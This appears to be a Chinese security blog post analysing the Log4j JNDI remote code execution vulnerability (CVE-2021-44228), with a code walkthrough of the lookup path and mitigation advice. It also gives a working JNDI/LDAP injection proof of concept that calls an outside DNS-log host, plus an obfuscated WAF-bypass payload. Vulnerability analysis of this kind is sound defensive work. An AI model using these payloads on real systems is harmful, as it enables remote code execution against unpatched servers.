Apache Log4j 远程命令执行漏洞CVE-2021-44228

最新推荐文章于 2024-05-16 12:44:20 发布
最新推荐文章于 2024-05-16 12:44:20 发布
阅读量1.3k 收藏 1
点赞数
分类专栏: 安全 文章标签: apache java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34101364/article/details/121845773
版权

Apache Log4j 远程命令执行漏洞,CVE-2021-44228
通过jndi协议远程调用恶意类执行命令

影响范围

Apache Log4j 2.x <= 2.15.0-rc1 版本均受影响。

2.15.0-rc1默认不受影响,除非主动开了lookup相关开关

环境

<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-api</artifactId>
    <version>2.14.1</version>
</dependency>
<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-core</artifactId>
    <version>2.14.1</version>
</dependency>

poc

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class Test {
    private static final Logger logger = LogManager.getLogger();

    public static void main(String[] args) {
        logger.error("123 ${jndi:ldap://m29.xxx.dnslog.io:51212/} 456");
    }
}

在这里插入图片描述
Apache Log4j 远程命令执行绕过payload,有些Log4j版本不受下面绕过的风险

${${qwe:a:-j}ndi:l${lower:D}ap://m27.dnslog.cn:51212/}

调试

我们直接进入关键函数org.apache.logging.log4j.core.pattern.MessagePatternConverter#format

public void format(final LogEvent event, final StringBuilder toAppendTo) {
        Message msg = event.getMessage();
        if (msg instanceof StringBuilderFormattable) {
            boolean doRender = this.textRenderer != null;
            StringBuilder workingBuilder = doRender ? new StringBuilder(80) : toAppendTo;
            int offset = workingBuilder.length();
            if (msg instanceof MultiFormatStringBuilderFormattable) {
                ((MultiFormatStringBuilderFormattable)msg).formatTo(this.formats, workingBuilder);
            } else {
                ((StringBuilderFormattable)msg).formatTo(workingBuilder);
            }

            if (this.config != null && !this.noLookups) {
                for(int i = offset; i < workingBuilder.length() - 1; ++i) {
                    if (workingBuilder.charAt(i) == '$' && workingBuilder.charAt(i + 1) == '{') {
                        String value = workingBuilder.substring(offset, workingBuilder.length());
                        workingBuilder.setLength(offset);
                        workingBuilder.append(this.config.getStrSubstitutor().replace(event, value));
                    }
                }
            }

            if (doRender) {
                this.textRenderer.render(workingBuilder, toAppendTo);
            }

        } else {
            if (msg != null) {
                String result;
                if (msg instanceof MultiformatMessage) {
                    result = ((MultiformatMessage)msg).getFormattedMessage(this.formats);
                } else {
                    result = msg.getFormattedMessage();
                }

                if (result != null) {
                    toAppendTo.append(this.config != null && result.contains("${") ? this.config.getStrSubstitutor().replace(event, result) : result);
                } else {
                    toAppendTo.append("null");
                }
            }

        }
    }

从函数中我们可以看到它会对 ‘{’ 和 ‘$’ 进行解析,接着进入org.apache.logging.log4j.core.lookup.StrSubstitutor#replace(org.apache.logging.log4j.core.LogEvent, java.lang.String)函数

    public String replace(final LogEvent event, final String source) {
        if (source == null) {
            return null;
        } else {
            StringBuilder buf = new StringBuilder(source);
            return !this.substitute(event, buf, 0, source.length()) ? source : buf.toString();
        }
    }

继续进入org.apache.logging.log4j.core.lookup.StrSubstitutor#substitute(org.apache.logging.log4j.core.LogEvent, java.lang.StringBuilder, int, int, java.util.List<java.lang.String>),这个函数逻辑较为复杂,主要作用是递归处理日志输入,然后转换为对应的输出

private int substitute(final LogEvent event, final StringBuilder buf, final int offset, final int length, List<String> priorVariables) {
        StrMatcher prefixMatcher = this.getVariablePrefixMatcher();
        StrMatcher suffixMatcher = this.getVariableSuffixMatcher();
        char escape = this.getEscapeChar();
        StrMatcher valueDelimiterMatcher = this.getValueDelimiterMatcher();
        boolean substitutionInVariablesEnabled = this.isEnableSubstitutionInVariables();
        boolean top = priorVariables == null;
        boolean altered = false;
        int lengthChange = 0;
        char[] chars = this.getChars(buf);
        int bufEnd = offset + length;
        int pos = offset;

        while(true) {
            label117:
            while(pos < bufEnd) {
                int startMatchLen = prefixMatcher.isMatch(chars, pos, offset, bufEnd);
                if (startMatchLen == 0) {
                    ++pos;
                } else if (pos > offset && chars[pos - 1] == escape) {
                    buf.deleteCharAt(pos - 1);
                    chars = this.getChars(buf);
                    --lengthChange;
                    altered = true;
                    --bufEnd;
                } else {
                    int startPos = pos;
                    pos += startMatchLen;
                    int endMatchLen = false;
                    int nestedVarCount = 0;

                    while(true) {
                        while(true) {
                            if (pos >= bufEnd) {
                                continue label117;
                            }

                            int endMatchLen;
                            if (substitutionInVariablesEnabled && (endMatchLen = prefixMatcher.isMatch(chars, pos, offset, bufEnd)) != 0) {
                                ++nestedVarCount;
                                pos += endMatchLen;
                            } else {
                                endMatchLen = suffixMatcher.isMatch(chars, pos, offset, bufEnd);
                                if (endMatchLen == 0) {
                                    ++pos;
                                } else {
                                    if (nestedVarCount == 0) {
                                        String varNameExpr = new String(chars, startPos + startMatchLen, pos - startPos - startMatchLen);
                                        if (substitutionInVariablesEnabled) {
                                            StringBuilder bufName = new StringBuilder(varNameExpr);
                                            this.substitute(event, bufName, 0, bufName.length());
                                            varNameExpr = bufName.toString();
                                        }

                                        pos += endMatchLen;
                                        String varName = varNameExpr;
                                        String varDefaultValue = null;
                                        int i;
                                        int valueDelimiterMatchLen;
                                        if (valueDelimiterMatcher != null) {
                                            char[] varNameExprChars = varNameExpr.toCharArray();
                                            int valueDelimiterMatchLen = false;

                                            label100:
                                            for(i = 0; i < varNameExprChars.length && (substitutionInVariablesEnabled || prefixMatcher.isMatch(varNameExprChars, i, i, varNameExprChars.length) == 0); ++i) {
                                                if (this.valueEscapeDelimiterMatcher != null) {
                                                    int matchLen = this.valueEscapeDelimiterMatcher.isMatch(varNameExprChars, i);
                                                    if (matchLen != 0) {
                                                        String varNamePrefix = varNameExpr.substring(0, i) + ':';
                                                        varName = varNamePrefix + varNameExpr.substring(i + matchLen - 1);
                                                        int j = i + matchLen;

                                                        while(true) {
                                                            if (j >= varNameExprChars.length) {
                                                                break label100;
                                                            }

                                                            if ((valueDelimiterMatchLen = valueDelimiterMatcher.isMatch(varNameExprChars, j)) != 0) {
                                                                varName = varNamePrefix + varNameExpr.substring(i + matchLen, j);
                                                                varDefaultValue = varNameExpr.substring(j + valueDelimiterMatchLen);
                                                                break label100;
                                                            }

                                                            ++j;
                                                        }
                                                    }

                                                    if ((valueDelimiterMatchLen = valueDelimiterMatcher.isMatch(varNameExprChars, i)) != 0) {
                                                        varName = varNameExpr.substring(0, i);
                                                        varDefaultValue = varNameExpr.substring(i + valueDelimiterMatchLen);
                                                        break;
                                                    }
                                                } else if ((valueDelimiterMatchLen = valueDelimiterMatcher.isMatch(varNameExprChars, i)) != 0) {
                                                    varName = varNameExpr.substring(0, i);
                                                    varDefaultValue = varNameExpr.substring(i + valueDelimiterMatchLen);
                                                    break;
                                                }
                                            }
                                        }

                                        if (priorVariables == null) {
                                            priorVariables = new ArrayList();
                                            ((List)priorVariables).add(new String(chars, offset, length + lengthChange));
                                        }

                                        this.checkCyclicSubstitution(varName, (List)priorVariables);
                                        ((List)priorVariables).add(varName);
                                        String varValue = this.resolveVariable(event, varName, buf, startPos, pos);
                                        if (varValue == null) {
                                            varValue = varDefaultValue;
                                        }

                                        if (varValue != null) {
                                            valueDelimiterMatchLen = varValue.length();
                                            buf.replace(startPos, pos, varValue);
                                            altered = true;
                                            i = this.substitute(event, buf, startPos, valueDelimiterMatchLen, (List)priorVariables);
                                            i += valueDelimiterMatchLen - (pos - startPos);
                                            pos += i;
                                            bufEnd += i;
                                            lengthChange += i;
                                            chars = this.getChars(buf);
                                        }

                                        ((List)priorVariables).remove(((List)priorVariables).size() - 1);
                                        continue label117;
                                    }

                                    --nestedVarCount;
                                    pos += endMatchLen;
                                }
                            }
                        }
                    }
                }
            }

            if (top) {
                return altered ? 1 : 0;
            }

            return lengthChange;
        }
    }

这里的关键函数是resolveVariable,我们看到我们的payload已经赋值给了varName
在这里插入图片描述
继续跟进org.apache.logging.log4j.core.lookup.StrSubstitutor#resolveVariable函数

protected String resolveVariable(final LogEvent event, final String variableName, final StringBuilder buf, final int startPos, final int endPos) {
        StrLookup resolver = this.getVariableResolver();
        return resolver == null ? null : resolver.lookup(event, variableName);
    }

发现非常关键的lookup函数,继续跟进

public String lookup(final LogEvent event, String var) {
        if (var == null) {
            return null;
        } else {
            int prefixPos = var.indexOf(58);
            if (prefixPos >= 0) {
                String prefix = var.substring(0, prefixPos).toLowerCase(Locale.US);
                String name = var.substring(prefixPos + 1);
                StrLookup lookup = (StrLookup)this.strLookupMap.get(prefix);
                if (lookup instanceof ConfigurationAware) {
                    ((ConfigurationAware)lookup).setConfiguration(this.configuration);
                }

                String value = null;
                if (lookup != null) {
                    value = event == null ? lookup.lookup(name) : lookup.lookup(event, name);
                }

                if (value != null) {
                    return value;
                }

                var = var.substring(prefixPos + 1);
            }

            if (this.defaultLookup != null) {
                return event == null ? this.defaultLookup.lookup(var) : this.defaultLookup.lookup(event, var);
            } else {
                return null;
            }
        }
    }

可以看到支持的lookup对象,所以我们还可以这样使用

logger.error("${java:runtime}");

在这里插入图片描述
这里传入的是jndi,所以本次调试会调用JndiLookup.lookup函数,最终通过jndiManager.lookup(jndiName)函数实现远调

public String lookup(final LogEvent event, final String key) {
        if (key == null) {
            return null;
        } else {
            String jndiName = this.convertJndiName(key);

            try {
                JndiManager jndiManager = JndiManager.getDefaultManager();
                Throwable var5 = null;

                String var6;
                try {
                    var6 = Objects.toString(jndiManager.lookup(jndiName), (String)null);
                } catch (Throwable var16) {
                    var5 = var16;
                    throw var16;
                } finally {
                    if (jndiManager != null) {
                        if (var5 != null) {
                            try {
                                jndiManager.close();
                            } catch (Throwable var15) {
                                var5.addSuppressed(var15);
                            }
                        } else {
                            jndiManager.close();
                        }
                    }

                }

                return var6;
            } catch (NamingException var18) {
                LOGGER.warn(LOOKUP, "Error looking up JNDI resource [{}].", jndiName, var18);
                return null;
            }
        }
    }

修改建议

升级至 2.15.0-rc2

在jvm参数中添加 -Dlog4j2.formatMsgNoLookups=true

系统环境变量中将FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS设置为true

建议JDK使用11.0.1、8u191、7u201、6u211及以上的高版本

创建“log4j2.component.properties”文件,文件中增加配置“log4j2.formatMsgNoLookups=true”

限制受影响应用对外访问互联网

WAF添加漏洞攻击代码临时拦截规则。

5wimming
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
log4j漏洞复现(CVE-2021-44228)
qq_32445755的博客
01-13 513
Log4j 是一款开源 Java 日志记录工具。Log4j 2 是对 Log4j 的重大升级,此次漏洞的出现,正是由用于 Log4j 2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境的配置。但在实现的过程,并未对输入进行严格的判断,从而造成漏洞的发生。
Log4j2远程命令执行CVE-2021-44228
weixin_48817799的博客
01-25 1075
Log4j2远程命令执行CVE-2021-44228) 前言一、vulfocus靶场二、复现步骤1.靶场如下2.点击抓包 前言 Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志。攻击者利用此特性可通过该漏洞构造特殊的数据请求包,最终触发远程代码执行。 一、vulfocus靶场 http://vulfocus.io.
Apache Log4j2 远程代码执行漏洞 2.15.0(CVE-2021-44228)
weixin_44047654的博客
01-09 1476
Apache Log4j2 远程代码执行漏洞< 2.15.0(CVE-2021-44228)
log4j远程代码执行(CVE-2021-44228)(2)
最新发布
m0_v648374的博客
05-16 342
Apache Log4j是一款非常受欢迎的Java日志记录框架,广泛应用于企业级应用和各种互联网产品。然而,近期公开的CVE-2021-44228漏洞给这个稳定的框架带来了严重威胁。这个漏洞允许攻击者在受影响的系统上执行任意代码,可能导致敏感数据泄露、系统被完全控制等严重后果。该漏洞的产生主要源于Log4j的某些功能在处理特定输入时存在安全缺陷。攻击者可以通过精心构造的输入,利用Java的反射机制,触发特定条件下的代码执行
Log4j2远程代码执行漏洞(cve-2021-44228)复现
citytwilight的博客
05-22 2699
Log4j2远程代码执行漏洞(cve-2021-44228)复现(反弹shell)
Log4j2远程命令执行(CVE-2021-44228)复现
weixin_47781572的博客
03-01 6327
漏洞说明 Log4jApache的开源日志记录组件。Log4j2是Log4j的升级版本,通过重写Log4j引入了丰富的功能特性。该日志组件被广泛应用于业务系统开发,用以记录程序输入输出日志信息。 由用于 Log4j 2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境的配置。
Log4j-CVE-2021-44228漏洞复现
MrHatSec的博客
03-31 3168
Log4j-CVE-2021-44228漏洞复现
Apache Log4j 远程代码执行漏洞(CVE-2021-44832)
10-25
然而,2021 年底,Log4j 发现了一个严重的安全漏洞,被称为 CVE-2021-44228(也称为 Log4Shell),这使得攻击者可以通过在日志记录注入恶意代码来远程执行任意代码,从而对受影响的系统造成严重威胁。 此漏洞源于...
Apache Log4j2 远程代码执行漏洞检测工具
12-15
然而,在2021年12月初,一个严重的安全漏洞CVE-2021-44228)被公开,这个漏洞被称为"Log4Shell",允许攻击者通过注入恶意的JNDI(Java Naming and Directory Interface)链接来执行远程代码,对受影响的系统造成...
CVE-2019-17571:Apache Log4j 1.2.X存在反序列化远程代码执行漏洞
04-24
CVE-2019-17571/Apache Log4j 1.2.X存在反序列化远程代码执行漏洞 漏洞预警参考链接: 1. 漏洞描述 Apache Log4j是美国阿帕奇(Apache)软件基金会的一款基于Java的开源日志记录工具.Apache Log4j 1.2.X系列版本...
log4j2.component.properties
12-13
log4j2.component.properties
apache-log4j-2.16.0-bin.rar
12-17
然而,2021年底,一个严重漏洞被发现,被称为“Log4Shell”或CVE-2021-44228,这个漏洞允许攻击者通过在日志记录注入恶意代码,实现远程代码执行(RCE),对受影响的系统造成严重威胁。 该漏洞源于Log4j2的一个...
Log4j远程代码执行漏洞CVE-2021-44228漏洞复现
Boom!脑洞大爆炸的博客
07-07 547
Log4j远程代码执行漏洞CVE-2021-44228漏洞复现
log4j漏洞分析
weixin_47623655的博客
04-11 693
近年来,log4j漏洞成为了备受关注的话题,因为它可能会导致攻击者远程执行代码。在本文,我们将详细讨论log4j漏洞的背景、原理和应对措施。
log4j2 日志的 log4j2.component.properties 文件内容
YKenan的博客
03-22 5605
log4j2 日志的 log4j2.component.properties 文件内容 此文件会随着时间不断更新 log4j2.loggerContextFactory=org.apache.logging.log4j.core.impl.Log4jContextFactory log4j.configurationFile=log4j/log4j2.xml ...
log4j 漏洞CVE-2021-44228 漏洞复现
kyliuw的博客
03-08 6012
log4j 漏洞CVE-2021-44228 漏洞复现
Log4j2 远程代码执行漏洞cve-2021-44228)原理剖析
Hi~ 土拨鼠
12-17 6145
文章目录1、JNDI、RMI、LDAP、JNDI注入?Log4j2 rce原理影响版本修复思路 要了解本次Log4j2 rce的原理,首先我们得知道什么是JNDI,什么是JNDI注入,什么是RMI,什么又是LDAP… 本文只讲原理,具体复现请转至:Log4j2 远程代码执行漏洞cve-2021-44228)复现(反弹shell) 1、JNDI、RMI、LDAP、JNDI注入? Java Name and Directory Interface:java命名和目录接口 是sun公司提供的一种标准的java
漏洞复现】Apache log4j RCE 远程代码执行漏洞(CVE-2021-44228)
qq_45244158的博客
12-14 5533
Log4j任意代码执行RCE(CVE-2021-44228)前言一、漏洞描述二、受影响的版本三、复现过程1.从Vulfocus靶场获取测试环境2.攻击过程四、修复建议1.升级到最新版本2.缓解措施3.流量查询 前言 2021年11月24日,阿里云安全团队正式向Apache报告了Apache Log4j2远程代码执行漏洞。由于Apache Log4j2的部分功能具有递归分析功能,攻击者可以直接构造恶意请求触发远程代码执行漏洞。 一、漏洞描述 Apache Log4j2 是一个基于 Java 的日志工具。这
Apache Log4j远程代码执行漏洞CVE-2021-44228)临时防护
03-07
答:针对Apache Log4j远程代码执行漏洞CVE-2021-44228),可以采取以下临时防护措施:1.升级Log4j版本至2.15.或以上;2.禁用Log4j JNDI功能;3.在防火墙上禁止外部访问Log4j JNDI服务;4.在应用程序禁用Log4j ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值